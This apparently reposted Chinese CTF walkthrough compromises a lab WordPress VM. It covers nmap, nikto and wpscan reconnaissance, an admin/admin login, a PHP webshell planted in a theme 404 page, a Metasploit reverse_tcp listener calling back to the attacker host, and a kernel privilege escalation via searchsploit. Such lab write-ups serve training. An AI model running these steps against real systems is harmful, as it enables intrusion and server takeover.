CTF-综合测试(高难度)【超详细】

目录

web安全介绍

环境配置

信息探测

深入挖掘

nikto扫描到robots.txt并进行访问

robots.txt文件出现/wordpress/,对其进行访问

返现用户登录界面,进行账号的枚举

尝试弱口令登录

生成webshell

上传shell

启动监听

执行shell

查看系统信息

提权

searchsploit ubuntu 4.4.0

编译代码

上传shellroot到/var/www/html下

下载shellroot到靶机

给shellroot提权并执行


web安全介绍

随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网英语越来越广泛,企业信息化的过程中各种英语都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更严重的则是在网页中植入恶意代码,使得网站访问者收到侵害。

环境配置

kali 192.168.20.128

靶机 192.168.20.142

链接:https://pan.baidu.com/s/1JOpCuCiS_ycd_ZRyehr4qw 
提取码:6cpf 

信息探测

nmap -sV 192.168.20.142

nmap -A -v -T4 192.168.20.142

nikto -host http://192.168.20.142

dirb http://192.168.20.142

深入挖掘

nikto扫描到robots.txt并进行访问

robots.txt文件出现/wordpress/,对其进行访问

返现用户登录界面,进行账号的枚举

wpscan --url http://192.168.20.142/wordpress/ --enumerate at --enumerate ap --enumerate u

尝试弱口令登录

admin/admin

生成webshell

上传shell

复制生成的shell上传到404页面上

启动监听

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.20.128

set lport 4444

run

执行shell

http://192.168.20.142/wordpress/wp-content/themes/twentyfourteen/404.php

查看系统信息

提权

sudo -l提权不行

searchsploit ubuntu 4.4.0

编译代码

  

上传shellroot到/var/www/html下

下载shellroot到靶机

给shellroot提权并执行

chomod 777 shellroot

执行shellroot

猜你喜欢

转载自blog.csdn.net/m0_63127854/article/details/126789669